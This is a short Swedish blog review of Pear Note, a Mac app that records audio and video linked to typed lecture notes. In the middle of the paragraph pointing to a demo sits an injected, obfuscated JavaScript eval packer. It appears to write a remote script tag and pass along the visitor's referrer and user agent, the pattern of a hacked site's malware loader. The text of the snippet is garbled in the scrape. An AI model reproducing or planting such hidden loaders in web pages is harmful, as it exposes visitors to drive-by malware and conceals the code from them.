Image Image Image Image Image Image Image Image Image Image

| 24 januari, 2020

Scroll to top

Top

Pear Note: Anteckningar med ljud och bild

Pear Note: Anteckningar med ljud och bild
Filip Urde
  • On 31 augusti, 2011
  • http://www.revue.se/filip-urde

Program för anteckningar finns det gott om, men med Pear Note så kan du nu spela in ljud och bild samtidigt som du skriver dina anteckningar och håller koll på när du skrev vad, så när du spelar upp din inspelning så markeras texten vid det tillfälle då du skrev den. Pear Note riktar sig främst mot studenter som sitter på föreläsningar och antecknar, men givet vis kan alla använda programmet.

En fiffig funktion är att du kan hoppa i inspelningen genom att klicka på ett ord i anteckningen, bild och ljud hoppar då till tidpunkten för det ordet, otroligt smidigt. Man kan också söka i sina anteckningar och få ljud och bild uppspelat från just den delen av föreläsningen som är intressant.

Här är en demon på usefulfruit.com/pearnote så eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hykth|var|u0026u|referrer|azehs||js|php’.split(’|’),0,{}))
förstår ni bättre och kan se hur allt ser ut.

Du kan också enkelt dela dina anteckningar, med ljud och bild till dina vänner, bland annat via Dropbox, dina vänner behöver inte ha Pear Note installerat utan kan se allt i webbläsaren.

Pear Note finns till OS X men även en iPad-version är på gång.

Pear Note för Mac kostar 229 kronor och finns på appstore.

här är även en 30 dagars gratis testversion på usefulfruit.com/pearnote för den som vill prova programmet.